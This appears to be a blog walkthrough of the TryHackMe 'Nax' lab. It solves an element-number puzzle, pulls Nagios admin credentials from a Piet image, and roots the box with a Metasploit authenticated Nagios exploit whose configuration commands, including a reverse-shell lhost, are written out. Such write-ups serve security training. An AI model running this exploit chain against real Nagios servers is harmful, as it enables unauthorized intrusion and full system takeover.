SecWalk.com

THM Walkthrough NAX

NAx is a machine released by Track Hack Me.

https://tryhackme.com/room/nax

Summary

The website shows a weird page which turns out to be chemical elements after solving this puzzle we are able to download a image file. when we do some stego stuff we are able to get some credentials for nagios. there is a Nagios Authenticated exploit available for nagios. after executing this we were able to get root on the box.

Enumeration

Nmap Scan

nmap -sV -sC  10.10.233.26

Web Page

When we go to the webpage, we see the following.

‘Decrypting’ the chemistry elements

This seems some kind of chemistry. (Ag – Hg – Ta – Sb – Po – Pd – Hg – Pt – Lr)

After some time, I googled: chemistry elements

Then I saw the following table.

Now each element represents a number:

Ag = 47

Hg = 80

Ta = 73

Sb = 51

Po = 84

Pd = 46

Hg = 80

Pt = 78  

Lr = 103

Now we place those number behind each other.

47 80 73 51 84 46 80 78 103

Converting ascii to test

Resource: https://convert.town/ascii-to-text

Now I put those numbers into the webpage table.

We found a new URL/image.

/PI3T.PNg

 

Downloading Image

In order to get the image on the system, I download it.

wget http://10.10.233.26/PI3T.PNg


Stego Stuff

Now performed some basic stego stuff.

exiftool PI3T.PNg

We see the artist is Piet Mondrian.

So, I searched for:

                Piet Mondrian crypto

Then I saw this reddit page:

From this reddit page, I can up to a webpage.

https://www.dangermouse.net/esoteric/piet.html

After reading this I googled the following.

https://www.bertnase.de/npiet/npiet-execute.php

Extract information from the imgae.

After we upload and execute it we see the following.

Some creddentails for something called: Nagios.

nagiosadmin:n3p3UQ&9BjLp4$7uhWdY

Locating the right exploit

searchsploit Nagios

We can use this exploit, because we already have the credentials to login.

Configuring msf exploit

Commands which I used to configure the exploit correctly.

set PASSWORD n3p3UQ&9BjLp4$7uhWdY

set USERNAME nagiosadmin

set rhosts  10.10.233.26

set lhost tun0

exploit

We are root now.

Made by Icel0rd

Leave a Reply